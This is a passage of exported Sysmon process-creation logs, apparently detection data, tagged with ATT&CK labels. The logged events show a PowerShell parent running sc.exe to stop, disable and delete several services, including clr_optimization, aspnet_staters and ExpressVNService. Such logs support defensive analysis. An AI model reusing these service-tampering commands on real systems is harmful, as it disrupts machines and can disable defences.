\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.704"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010c7961900}"",""processId"":""7452"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.167",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.671 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001059941900} +ProcessId: 7372 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.673461400Z"",""eventRecordID"":""2168"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.671\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001059941900}\r\nProcessId: 7372\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.671"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001059941900}"",""processId"":""7372"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.151",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.655 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00107d931900} +ProcessId: 7344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config aspnet_staters Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.658586400Z"",""eventRecordID"":""2167"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.655\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00107d931900}\r\nProcessId: 7344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.655"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00107d931900}"",""processId"":""7344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config aspnet_staters Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.103",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.610 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010d3911900} +ProcessId: 7292 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.613516600Z"",""eventRecordID"":""2165"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.610\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010d3911900}\r\nProcessId: 7292\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.610"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010d3911900}"",""processId"":""7292"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.056",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.561 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010758f1900} +ProcessId: 7212 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.563317500Z"",""eventRecordID"":""2162"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.561\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010758f1900}\r\nProcessId: 7212\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.561"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010758f1900}"",""processId"":""7212"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.025",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.530 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e48d1900} +ProcessId: 5020 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.533641500Z"",""eventRecordID"":""2160"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.530\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e48d1900}\r\nProcessId: 5020\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.530"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010e48d1900}"",""processId"":""5020"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.009",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.517 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00101b8d1900} +ProcessId: 5448 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.519628900Z"",""eventRecordID"":""2159"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.517\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00101b8d1900}\r\nProcessId: 5448\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 